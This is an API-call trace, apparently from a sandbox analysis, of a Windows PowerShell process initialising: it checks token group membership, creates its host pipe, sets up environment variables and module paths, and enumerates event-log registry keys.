	[0041.508] CreateWellKnownSid (in: WellKnownSidType=0x1a, DomainSid=0x0, pSid=0x150472608f0, cbSid=0x184b47b620 | out: pSid=0x150472608f0*(Revision=0x1, SubAuthorityCount=0x2, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=([0]=0x20, [1]=0x0)), cbSid=0x184b47b620) returned 1
	[0041.509] GetCurrentProcess () returned 0xffffffffffffffff
	[0041.509] OpenProcessToken (in: ProcessHandle=0xffffffffffffffff, DesiredAccess=0x2000000, TokenHandle=0x184b47b528 | out: TokenHandle=0x184b47b528*=0x2e8) returned 1
	[0041.509] GetTokenInformation (in: TokenHandle=0x2e8, TokenInformationClass=0x8, TokenInformation=0x0, TokenInformationLength=0x0, ReturnLength=0x184b47b588 | out: TokenInformation=0x0, ReturnLength=0x184b47b588) returned 0
	[0041.509] LocalAlloc (uFlags=0x0, uBytes=0x4) returned 0x15045596f10
	[0041.509] GetTokenInformation (in: TokenHandle=0x2e8, TokenInformationClass=0x8, TokenInformation=0x15045596f10, TokenInformationLength=0x4, ReturnLength=0x184b47b588 | out: TokenInformation=0x15045596f10, ReturnLength=0x184b47b588) returned 1
	[0041.509] LocalFree (hMem=0x15045596f10) returned 0x0
	[0041.510] DuplicateTokenEx (in: hExistingToken=0x2e8, dwDesiredAccess=0x8, lpTokenAttributes=0x0, ImpersonationLevel=0x2, TokenType=0x2, phNewToken=0x184b47b5e8 | out: phNewToken=0x184b47b5e8*=0x2f8) returned 1
	[0041.510] CheckTokenMembership (in: TokenHandle=0x2f8, SidToCheck=0x15047261050*(Revision=0x1, SubAuthorityCount=0x2, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=([0]=0x20, [1]=0x0)), IsMember=0x184b47b5f0 | out: IsMember=0x184b47b5f0) returned 1
	[0041.510] CloseHandle (hObject=0x2f8) returned 1
	[0041.510] GetCurrentProcess () returned 0xffffffffffffffff
	[0041.510] OpenProcessToken (in: ProcessHandle=0xffffffffffffffff, DesiredAccess=0x2000000, TokenHandle=0x184b47b528 | out: TokenHandle=0x184b47b528*=0x2f8) returned 1
	[0041.510] GetTokenInformation (in: TokenHandle=0x2f8, TokenInformationClass=0x1, TokenInformation=0x0, TokenInformationLength=0x0, ReturnLength=0x184b47b628 | out: TokenInformation=0x0, ReturnLength=0x184b47b628) returned 0
	[0041.510] LocalAlloc (uFlags=0x0, uBytes=0x2c) returned 0x150455c3de0
	[0041.510] GetTokenInformation (in: TokenHandle=0x2f8, TokenInformationClass=0x1, TokenInformation=0x150455c3de0, TokenInformationLength=0x2c, ReturnLength=0x184b47b628 | out: TokenInformation=0x150455c3de0, ReturnLength=0x184b47b628) returned 1
	[0041.510] LocalFree (hMem=0x150455c3de0) returned 0x0
	[0041.514] CreateNamedPipeW (lpName="\\\\.\\pipe\\PSHost.131891832590894829.4088.DefaultAppDomain.powershell" (normalized: "\\device\\namedpipe\\pshost.131891832590894829.4088.defaultappdomain.powershell"), dwOpenMode=0x40080003, dwPipeMode=0x6, nMaxInstances=0x1, nOutBufferSize=0x8000, nInBufferSize=0x8000, nDefaultTimeOut=0x0, lpSecurityAttributes=0x184b47b530) returned 0x2f0
	[0041.554] GetFileType (hFile=0x2f0) returned 0x3
	[0041.606] CoTaskMemAlloc (cb=0x20c) returned 0x150455a9f70
	[0041.606] GetEnvironmentVariableW (in: lpName="PathEXT", lpBuffer=0x150455a9f70, nSize=0x104 | out: lpBuffer=".COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC") returned 0x35
	[0041.606] CoTaskMemFree (pv=0x150455a9f70) 
	[0041.608] SetEnvironmentVariableW (lpName="PathEXT", lpValue=".COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC;.CPL") returned 1
	[0041.796] CoCreateGuid (in: pguid=0x184b47ac68 | out: pguid=0x184b47ac68*(Data1=0x1e02e9d7, Data2=0x6fe4, Data3=0x41a7, Data4=([0]=0x95, [1]=0x66, [2]=0xfa, [3]=0xa6, [4]=0x61, [5]=0xd4, [6]=0xaf, [7]=0x57))) returned 0x0
	[0041.989] CoTaskMemAlloc (cb=0x20c) returned 0x1505f3b7650
	[0041.989] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x1505f3b7650, nSize=0x104 | out: lpBuffer="") returned 0x0
	[0041.989] CoTaskMemFree (pv=0x1505f3b7650) 
	[0041.992] CoTaskMemAlloc (cb=0x20c) returned 0x1505f3b6990
	[0041.992] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x1505f3b6990, nSize=0x104 | out: lpBuffer="") returned 0x0
	[0041.993] CoTaskMemFree (pv=0x1505f3b6990) 
	[0042.029] CoTaskMemAlloc (cb=0x20c) returned 0x1505f3b8310
	[0042.029] GetEnvironmentVariableW (in: lpName="PSMODULEPATH", lpBuffer=0x1505f3b8310, nSize=0x104 | out: lpBuffer="C:\\Program Files\\WindowsPowerShell\\Modules;C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules") returned 0x5d
	[0042.029] CoTaskMemFree (pv=0x1505f3b8310) 
	[0042.030] ExpandEnvironmentStringsW (in: lpSrc="C:\\Program Files\\WindowsPowerShell\\Modules;C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules", lpDst=0x184b47d2d0, nSize=0x64 | out: lpDst="C:\\Program Files\\WindowsPowerShell\\Modules;C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules") returned 0x5e
	[0042.030] RegOpenKeyExW (in: hKey=0xffffffff80000002, lpSubKey="System\\CurrentControlSet\\Control\\Session Manager\\Environment", ulOptions=0x0, samDesired=0x20019, phkResult=0x184b47d3d8 | out: phkResult=0x184b47d3d8*=0x340) returned 0x0
	[0042.030] RegQueryValueExW (in: hKey=0x340, lpValueName="PSMODULEPATH", lpReserved=0x0, lpType=0x184b47d428, lpData=0x0, lpcbData=0x184b47d420*=0x0 | out: lpType=0x184b47d428*=0x2, lpData=0x0, lpcbData=0x184b47d420*=0xbc) returned 0x0
	[0042.030] RegQueryValueExW (in: hKey=0x340, lpValueName="PSMODULEPATH", lpReserved=0x0, lpType=0x184b47d428, lpData=0x1504715b720, lpcbData=0x184b47d420*=0xbc | out: lpType=0x184b47d428*=0x2, lpData="%ProgramFiles%\\WindowsPowerShell\\Modules;%SystemRoot%\\system32\\WindowsPowerShell\\v1.0\\Modules", lpcbData=0x184b47d420*=0xbc) returned 0x0
	[0042.030] ExpandEnvironmentStringsW (in: lpSrc="%ProgramFiles%", lpDst=0x184b47d180, nSize=0x64 | out: lpDst="C:\\Program Files") returned 0x11
	[0042.030] ExpandEnvironmentStringsW (in: lpSrc="%\\WindowsPowerShell\\Modules;%", lpDst=0x184b47d180, nSize=0x64 | out: lpDst="%\\WindowsPowerShell\\Modules;%") returned 0x1e
	[0042.030] ExpandEnvironmentStringsW (in: lpSrc="%SystemRoot%", lpDst=0x184b47d180, nSize=0x64 | out: lpDst="C:\\Windows") returned 0xb
	[0042.030] ExpandEnvironmentStringsW (in: lpSrc="%ProgramFiles%\\WindowsPowerShell\\Modules;%SystemRoot%\\system32\\WindowsPowerShell\\v1.0\\Modules", lpDst=0x184b47d180, nSize=0x64 | out: lpDst="C:\\Program Files\\WindowsPowerShell\\Modules;C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules") returned 0x5e
	[0042.030] RegCloseKey (hKey=0x340) returned 0x0
	[0042.030] ExpandEnvironmentStringsW (in: lpSrc="C:\\Program Files\\WindowsPowerShell\\Modules;C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules", lpDst=0x184b47d2d0, nSize=0x64 | out: lpDst="C:\\Program Files\\WindowsPowerShell\\Modules;C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules") returned 0x5e
	[0042.031] RegOpenKeyExW (in: hKey=0xffffffff80000001, lpSubKey="Environment", ulOptions=0x0, samDesired=0x20019, phkResult=0x184b47d3d8 | out: phkResult=0x184b47d3d8*=0x340) returned 0x0
	[0042.031] RegQueryValueExW (in: hKey=0x340, lpValueName="PSMODULEPATH", lpReserved=0x0, lpType=0x184b47d428, lpData=0x0, lpcbData=0x184b47d420*=0x0 | out: lpType=0x184b47d428*=0x0, lpData=0x0, lpcbData=0x184b47d420*=0x0) returned 0x2
	[0042.031] RegCloseKey (hKey=0x340) returned 0x0
	[0042.031] CoTaskMemAlloc (cb=0x20c) returned 0x1505f3b8db0
	[0042.031] SHGetFolderPathW (in: hwnd=0x0, csidl=5, hToken=0x0, dwFlags=0x0, pszPath=0x1505f3b8db0 | out: pszPath="C:\\Users\\Nd9E1FYi\\Documents") returned 0x0
	[0042.032] CoTaskMemFree (pv=0x1505f3b8db0) 
	[0042.032] GetFullPathNameW (in: lpFileName="C:\\Users\\Nd9E1FYi\\Documents", nBufferLength=0x105, lpBuffer=0x184b47cd30, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\Nd9E1FYi\\Documents", lpFilePart=0x0) returned 0x1b
	[0042.033] CoTaskMemAlloc (cb=0x20c) returned 0x1505f3b91f0
	[0042.033] SHGetFolderPathW (in: hwnd=0x0, csidl=38, hToken=0x0, dwFlags=0x0, pszPath=0x1505f3b91f0 | out: pszPath="C:\\Program Files") returned 0x0
	[0042.033] CoTaskMemFree (pv=0x1505f3b91f0) 
	[0042.033] GetFullPathNameW (in: lpFileName="C:\\Program Files", nBufferLength=0x105, lpBuffer=0x184b47cd30, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files", lpFilePart=0x0) returned 0x10
	[0042.033] SetEnvironmentVariableW (lpName="PSMODULEPATH", lpValue="C:\\Users\\Nd9E1FYi\\Documents\\WindowsPowerShell\\Modules;C:\\Program Files\\WindowsPowerShell\\Modules;C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules") returned 1
	[0042.035] CoTaskMemAlloc (cb=0x20c) returned 0x1505f3b7ed0
	[0042.035] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x1505f3b7ed0, nSize=0x104 | out: lpBuffer="") returned 0x0
	[0042.035] CoTaskMemFree (pv=0x1505f3b7ed0) 
	[0042.107] CoTaskMemAlloc (cb=0x20c) returned 0x1505f3b6ff0
	[0042.107] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x1505f3b6ff0, nSize=0x104 | out: lpBuffer="\xf8d0\xf893\x7ffb") returned 0x0
	[0042.107] CoTaskMemFree (pv=0x1505f3b6ff0) 
	[0042.112] CoTaskMemAlloc (cb=0x20c) returned 0x1505f3b6770
	[0042.112] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x1505f3b6770, nSize=0x104 | out: lpBuffer="\xf8d0\xf893\x7ffb") returned 0x0
	[0042.112] CoTaskMemFree (pv=0x1505f3b6770) 
	[0042.190] CoTaskMemAlloc (cb=0x20c) returned 0x1505f3b9410
	[0042.190] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x1505f3b9410, nSize=0x104 | out: lpBuffer="\xf8d0\xf893\x7ffb") returned 0x0
	[0042.191] CoTaskMemFree (pv=0x1505f3b9410) 
	[0042.207] RegOpenKeyExW (in: hKey=0xffffffff80000002, lpSubKey="SYSTEM\\CurrentControlSet\\Services\\EventLog", ulOptions=0x0, samDesired=0x20019, phkResult=0x184b47d028 | out: phkResult=0x184b47d028*=0x350) returned 0x0
	[0042.209] RegQueryInfoKeyW (in: hKey=0x350, lpClass=0x0, lpcchClass=0x0, lpReserved=0x0, lpcSubKeys=0x184b47d0b0, lpcbMaxSubKeyLen=0x0, lpcbMaxClassLen=0x0, lpcValues=0x184b47d0a8, lpcbMaxValueNameLen=0x0, lpcbMaxValueLen=0x0, lpcbSecurityDescriptor=0x0, lpftLastWriteTime=0x0 | out: lpClass=0x0, lpcchClass=0x0, lpcSubKeys=0x184b47d0b0*=0x8, lpcbMaxSubKeyLen=0x0, lpcbMaxClassLen=0x0, lpcValues=0x184b47d0a8*=0x10, lpcbMaxValueNameLen=0x0, lpcbMaxValueLen=0x0, lpcbSecurityDescriptor=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0042.209] CoTaskMemFree (pv=0x0) 
	[0042.209] RegEnumKeyExW (in: hKey=0x350, dwIndex=0x0, lpName=0x1504718b018, lpcchName=0x184b47d118, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="Application", lpcchName=0x184b47d118, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0042.209] CoTaskMemFree (pv=0x0) 
	[0042.209] RegEnumKeyExW (in: hKey=0x350, dwIndex=0x1, lpName=0x1504718b018, lpcchName=0x184b47d118, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="HardwareEvents", lpcchName=0x184b47d118, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0042.209] CoTaskMemFree (pv=0x0) 
	[0042.209] RegEnumKeyExW (in: hKey=0x350, dwIndex=0x2, lpName=0x1504718b018, lpcchName=0x184b47d118, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="Internet Explorer", lpcchName=0x184b47d118, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0042.209] CoTaskMemFree (pv=0x0) 
	[0042.209] RegEnumKeyExW (in: hKey=0x350, dwIndex=0x3, lpName=0x1504718b018, lpcchName=0x184b47d118, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="Key Management Service", lpcchName=0x184b47d118, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0042.209] CoTaskMemFree (pv=0x0) 
	[0042.209] RegEnumKeyExW (in: hKey=0x350, dwIndex=0x4, lpName=0x1504718b018, lpcchName=0x184b47d118, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="OAlerts", lpcchName=0x184b47d118, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0042.209] CoTaskMemFree (pv=0x0) 
	[0042.209] RegEnumKeyExW (in: hKey=0x350, dwIndex=0x5, lpName=0x1504718b018, lpcchName=0x184b47d118, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="Security", lpcchName=0x184b47d118, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0042.210] CoTaskMemFree (pv=0x0) 
	[0042.210] RegEnumKeyExW (in: hKey=0x350, dwIndex=0x6, lpName=0x1504718b018, lpcchName=0x184b47d118, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="System", lpcchName=0x184b47d118, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0042.210] CoTaskMemFree (pv=0x0) 
	[0042.210] RegEnumKeyExW (in: hKey=0x350, dwIndex=0x7, lpName=0x1504718b018, lpcchName=0x184b47d118, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="Windows PowerShell", lpcchName=0x184b47d118, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0042.211] CoTaskMemFree (pv=0x0) 
	[0042.211] RegOpenKeyExW (in: hKey=0x350, lpSubKey="Application", ulOptions=0x0, samDesired=0x20019, phkResult=0x184b47d088 | out: phkResult=0x184b47d088*=0x340) returned 0x0
	[0042.211] RegOpenKeyExW (in: hKey=0x340, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x184b47d088 | out: phkResult=0x184b47d088*=0x0) returned 0x2
	[0042.211] RegCloseKey (hKey=0x340) returned 0x0
	[0042.211] RegOpenKeyExW (in: hKey=0x350, lpSubKey="HardwareEvents", ulOptions=0x0, samDesired=0x20019, phkResult=0x184b47d088 | out: phkResult=0x184b47d088*=0x340) returned 0x0
	[0042.211] RegOpenKeyExW (in: hKey=0x340, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x184b47d088 | out: phkResult=0x184b47d088*=0x0) returned 0x2
	[0042.211] RegCloseKey (hKey=0x340) returned 0x0
	[0042.211] RegOpenKeyExW (in: hKey=0x350, lpSubKey="Internet Explorer", ulOptions=0x0, samDesired=0x20019, phkResult=0x184b47d088 | out: phkResult=0x184b47d088*=0x340) returned 0x0
	[0042.211] RegOpenKeyExW (in: hKey=0x340, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x184b47d088 | out: phkResult=0x184b47d088*=0x0) returned 0x2
	[0042.211] RegCloseKey (hKey=0x340) returned 0x0
	[0042.211] RegOpenKeyExW (in: hKey=0x350, lpSubKey="Key Management Service", ulOptions=0x0, samDesired=0x20019, phkResult=0x184b47d088 | out: phkResult=0x184b47d088*=0x340) returned 0x0
	[0042.211] RegOpenKeyExW (in: hKey=0x340, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x184b47d088 | out: phkResult=0x184b47d088*=0x0) returned 0x2
	[0042.211] RegCloseKey (hKey=0x340) returned 0x0
	[0042.211] RegOpenKeyExW (in: hKey=0x350, lpSubKey="OAlerts", ulOptions=0x0, samDesired=0x20019, phkResult=0x184b47d088 | out: phkResult=0x184b47d088*=0x340) returned 0x0
	[0042.211] RegOpenKeyExW (in: hKey=0x340, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x184b47d088 | out: phkResult=0x184b47d088*=0x0) returned 0x2
	[0042.211] RegCloseKey (hKey=0x340) returned 0x0
	[0042.211] RegOpenKeyExW (in: hKey=0x350, lpSubKey="Security", ulOptions=0x0, samDesired=0x20019, phkResult=0x184b47d088 | out: phkResult=0x184b47d088*=0x0) returned 0x5
	[0042.240] RegOpenKeyExW (in: hKey=0x350, lpSubKey="System", ulOptions=0x0, samDesired=0x20019, phkResult=0x184b47d088 | out: phkResult=0x184b47d088*=0x340) returned 0x0
	[0042.241] RegOpenKeyExW (in: hKey=0x340, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x184b47d088 | out: phkResult=0x184b47d088*=0x0) returned 0x2
	[0042.241] RegCloseKey (hKey=0x340) returned 0x0
	[0042.241] RegOpenKeyExW (in: hKey=0x350, lpSubKey="Windows PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x184b47d088 | out: phkResult=0x184b47d088*=0x340) returned 0x0
	[0042.241] RegOpenKeyExW (in: hKey=0x340, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x184b47d088 | out: phkResult=0x184b47d088*=0x34c) returned 0x0
	[0042.241] RegCloseKey (hKey=0x34c) returned 0x0
	[0042.241] RegCloseKey (hKey=0x350) returned 0x0
	[0042.242] RegCloseKey (hKey=0x340) returned 0x0
	[0042.262] CoTaskMemAlloc (cb=0x804) returned 0x150455853a0
	[0042.262] GetUserNameExW (in: NameFormat=0x2, lpNameBuffer=0x150455853a0, nSize=0x184b47d310 | out: lpNameBuffer="X2VS1CUM\\Nd9E1FYi", nSize=0x184b47d310) returned 0x1
	[0042.265] CoTaskMemFree (pv=0x150455853a0) 
	[0042.265] GetUserNameW (in: lpBuffer=0x184b47d000, pcbBuffer=0x184b47d328 | out: lpBuffer="Nd9E1FYi", pcbBuffer=0x184b47d328) returned 1
	[0042.266] GetTimeZoneInformation (in: lpTimeZoneInformation=0x184b47cfe0 | out: lpTimeZoneInformation=0x184b47cfe0) returned 0x1
	[0042.316] RegOpenKeyExW (in: hKey=0xffffffff80000002, lpSubKey="SYSTEM\\CurrentControlSet\\Services\\EventLog", ulOptions=0x0, samDesired=0x20019, phkResult=0x184b47d038 | out: phkResult=0x184b47d038*=0x354) returned 0x0
	[0042.316] RegQueryInfoKeyW (in: hKey=0x354, lpClass=0x0, lpcchClass=0x0, lpReserved=0x0, lpcSubKeys=0x184b47d0c0, lpcbMaxSubKeyLen=0x0, lpcbMaxClassLen=0x0, lpcValues=0x184b47d0b8, lpcbMaxValueNameLen=0x0, lpcbMaxValueLen=0x0, lpcbSecurityDescriptor=0x0, lpftLastWriteTime=0x0 | out: lpClass=0x0, lpcchClass=0x0, lpcSubKeys=0x184b47d0c0*=0x8, lpcbMaxSubKeyLen=0x0, lpcbMaxClassLen=0x0, lpcValues=0x184b47d0b8*=0x10, lpcbMaxValueNameLen=0x0, lpcbMaxValueLen=0x0, lpcbSecurityDescriptor=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0042.316] RegEnumKeyExW (in: hKey=0x354, dwIndex=0x0, lpName=0x150471a3ca8, lpcchName=0x184b47d128, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="Application", lpcchName=0x184b47d128, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0042.316] CoTaskMemFree (pv=0x0) 
	[0042.316] RegEnumKeyExW (in: hKey=0x354, dwIndex=0x1, lpName=0x150471a3ca8, lpcchName=0x184b47d128, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="HardwareEvents", lpcchName=0x184b47d128, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0042.316] CoTaskMemFree (pv=0x0) 
	[0042.316] RegEnumKeyExW (in: hKey=0x354, dwIndex=0x2, lpName=0x150471a3ca8, lpcchName=0x184b47d128, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="Internet Explorer", lpcchName=0x184b47d128, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0042.316] CoTaskMemFree (pv=0x0) 
	[0042.316] RegEnumKeyExW (in: hKey=0x354, dwIndex=0x3, lpName=0x150471a3ca8, lpcchName=0x184b47d128, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="Key Management Service", lpcchName=0x184b47d128, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0042.316] CoTaskMemFree (pv=0x0) 
	[0042.316] RegEnumKeyExW (in: hKey=0x354, dwIndex=0x4, lpName=0x150471a3ca8, lpcchName=0x184b47d128, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="OAlerts", lpcchName=0x184b47d128, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0042.316] CoTaskMemFree (pv=0x0) 
	[0042.316] RegEnumKeyExW (in: hKey=0x354, dwIndex=0x5, lpName=0x150471a3ca8, lpcchName=0x184b47d128, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="Security", lpcchName=0x184b47d128, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0042.316] CoTaskMemFree (pv=0x0) 
	[0042.316] RegEnumKeyExW (in: hKey=0x354, dwIndex=0x6, lpName=0x150471a3ca8, lpcchName=0x184b47d128, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="System", lpcchName=0x184b47d128, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0042.316] CoTaskMemFree (pv=0x0) 
	[0042.316] RegEnumKeyExW (in: hKey=0x354, dwIndex=0x7, lpName=0x150471a3ca8, lpcchName=0x184b47d128, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="Windows PowerShell", lpcchName=0x184b47d128, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0042.316] CoTaskMemFree (pv=0x0) 
	[0042.316] RegOpenKeyExW (in: hKey=0x354, lpSubKey="Application", ulOptions=0x0, samDesired=0x20019, phkResult=0x184b47d098 | out: phkResult=0x184b47d098*=0x358) returned 0x0
	[0042.317] RegOpenKeyExW (in: hKey=0x358, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x184b47d098 | out: phkResult=0x184b47d098*=0x0) returned 0x2
	[0042.317] RegCloseKey (hKey=0x358) returned 0x0
	[0042.342] RegOpenKeyExW (in: hKey=0x354, lpSubKey="HardwareEvents", ulOptions=0x0, samDesired=0x20019, phkResult=0x184b47d098 | out: phkResult=0x184b47d098*=0x358) returned 0x0
	[0042.343] RegOpenKeyExW (in: hKey=0x358, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x184b47d098 | out: phkResult=0x184b47d098*=0x0) returned 0x2
	[0042.343] RegCloseKey (hKey=0x358) returned 0x0
	[0042.343] RegOpenKeyExW (in: hKey=0x354, lpSubKey="Internet Explorer", ulOptions=0x0, samDesired=0x20019, phkResult=0x184b47d098 | out: phkResult=0x184b47d098*=0x358) returned 0x0
	[0042.343] RegOpenKeyExW (in: hKey=0x358, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x184b47d098 | out: phkResult=0x184b47d098*=0x0) returned 0x2
	[0042.343] RegCloseKey (hKey=0x358) returned 0x0
	[0042.343] RegOpenKeyExW (in: hKey=0x354, lpSubKey="Key Management Service", ulOptions=0x0, samDesired=0x20019, phkResult=0x184b47d098 | out: phkResult=0x184b47d098*=0x358) returned 0x0
	[0042.343] RegOpenKeyExW (in: hKey=0x358, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x184b47d098 | out: phkResult=0x184b47d098*=0x0) returned 0x2
	[0042.343] RegCloseKey (hKey=0x358) returned 0x0
	[0042.343] RegOpenKeyExW (in: hKey=0x354, lpSubKey="OAlerts", ulOptions=0x0, samDesired=0x20019, phkResult=0x184b47d098 | out: phkResult=0x184b47d098*=0x358) returned 0x0
	[0042.343] RegOpenKeyExW (in: hKey=0x358, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x184b47d098 | out: phkResult=0x184b47d098*=0x0) returned 0x2
	[0042.343] RegCloseKey (hKey=0x358) returned 0x0
	[0042.343] RegOpenKeyExW (in: hKey=0x354, lpSubKey="Security", ulOptions=0x0, samDesired=0x20019, phkResult=0x184b47d098 | out: phkResult=0x184b47d098*=0x0) returned 0x5
	[0042.344] RegOpenKeyExW (in: hKey=0x354, lpSubKey="System", ulOptions=0x0, samDesired=0x20019, phkResult=0x184b47d098 | out: phkResult=0x184b47d098*=0x358) returned 0x0
	[0042.344] RegOpenKeyExW (in: hKey=0x358, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x184b47d098 | out: phkResult=0x184b47d098*=0x0) returned 0x2
	[0042.344] RegCloseKey (hKey=0x358) returned 0x0
	[0042.344] RegOpenKeyExW (in: hKey=0x354, lpSubKey="Windows PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x184b47d098 | out: phkResult=0x184b47d098*=0x358) returned 0x0
	[0042.344] RegOpenKeyExW (in: hKey=0x358, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x184b47d098 | out: phkResult=0x184b47d098*=0x35c) returned 0x0
	[0042.345] RegCloseKey (hKey=0x35c) returned 0x0
	[0042.345] RegCloseKey (hKey=0x354) returned 0x0
	[0042.345] RegCloseKey (hKey=0x358) returned 0x0
	[0042.345] RegOpenKeyExW (in: hKey=0xffffffff80000002, lpSubKey="SYSTEM\\CurrentControlSet\\Services\\EventLog", ulOptions=0x0, samDesired=0x20019, phkResult=0x184b47d058 | out: phkResult=0x184b47d058*=0x358) returned 0x0
	[0042.345] RegQueryInfoKeyW (in: hKey=0x358, lpClass=0x0, lpcchClass=0x0, lpReserved=0x0, lpcSubKeys=0x184b47d0e0, lpcbMaxSubKeyLen=0x0, lpcbMaxClassLen=0x0, lpcValues=0x184b47d0d8, lpcbMaxValueNameLen=0x0, lpcbMaxValueLen=0x0, lpcbSecurityDescriptor=0x0, lpftLastWriteTime=0x0 | out: lpClass=0x0, lpcchClass=0x0, lpcSubKeys=0x184b47d0e0*=0x8, lpcbMaxSubKeyLen=0x0, lpcbMaxClassLen=0x0, lpcValues=0x184b47d0d8*=0x10, lpcbMaxValueNameLen=0x0, lpcbMaxValueLen=0x0, lpcbSecurityDescriptor=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0042.345] RegEnumKeyExW (in: hKey=0x358, dwIndex=0x0, lpName=0x150471a54d8, lpcchName=0x184b47d148, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="Application", lpcchName=0x184b47d148, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0042.345] CoTaskMemFree (pv=0x0) 
	[0042.345] RegEnumKeyExW (in: hKey=0x358, dwIndex=0x1, lpName=0x150471a54d8, lpcchName=0x184b47d148, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="HardwareEvents", lpcchName=0x184b47d148, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0042.345] CoTaskMemFree (pv=0x0) 
